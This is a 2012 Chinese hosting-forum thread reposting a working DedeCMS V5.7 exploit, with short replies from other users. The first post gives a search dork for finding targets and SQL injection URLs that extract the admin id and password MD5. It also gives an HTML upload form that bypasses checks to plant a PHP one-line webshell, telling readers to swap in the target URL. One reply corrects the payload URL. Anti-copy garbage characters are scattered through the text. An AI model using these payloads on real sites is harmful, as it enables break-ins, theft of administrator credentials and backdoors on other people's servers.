全球主机交流论坛

标题: 又看到有人发布dede漏洞了,朋友们注意呀 [打印本页]

作者: zzyxz    时间: 2012-4-28 23:24
标题: 又看到有人发布dede漏洞了,朋友们注意呀

发布时间:2012-4.264 e1 S' V& b- U; W- Q
发布作者:佚名
漏洞类型:注入漏洞、上传漏洞
漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。
  注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,
  然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

  然后写上语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
  /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码
  得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
1 O# K1 ~; Y5 u( E# |" }
  上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,
  只要登陆会员中心,然后访问页面链接
  “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”
  如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

 于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
8 \. y* \# {" C4 n) K
<[/url">http://www.sa666.com/plus/carbuy ... t&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">( W% E- Y4 Q* l) c+ R
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>

把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。
作者: zzyxz    时间: 2012-4-28 23:24
乱码是人家论坛的防转载
作者: 每次醒来    时间: 2012-4-28 23:25
看不懂,但好像很牛X的感觉!
作者: wst321    时间: 2012-4-28 23:27
看不懂,但好像很牛X的感觉!
作者: 有个就好    时间: 2012-4-28 23:39
把乱码去一下啊
作者: shineme    时间: 2012-4-28 23:39

看不懂,但好像很牛X的感觉!
作者: 神马皆浮云    时间: 2012-4-29 00:34
楼上是黑阔
楼下也是
作者: Comcast    时间: 2012-4-29 00:37
WP无压力啊,DEDECMS终极放黑方案见:http://www.lilynana.eu.org/thread-120542-1-1.html  
作者: zzyxz    时间: 2012-4-29 00:38
刚才有看到朋友说测试了
可以搞定管理员的MD5...

我表示不玩dede,只是转过来
作者: 誓誓    时间: 2012-4-29 01:27
完了
作者: kuku    时间: 2012-4-29 03:23
看不懂,但好像很牛X的感觉!
作者: 过客    时间: 2012-4-29 05:31
爆出跟没爆出的太多了,只要在用都危险。
作者: 飞天金猪    时间: 2012-4-29 09:03
  1. /plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post
复制代码
是错的
应是
  1. /plus/carbuyaction.php?dopost=memclickout&oid=
  2. S-P0RN8888&rs[code]=../dialog/select_soft_post
复制代码





欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4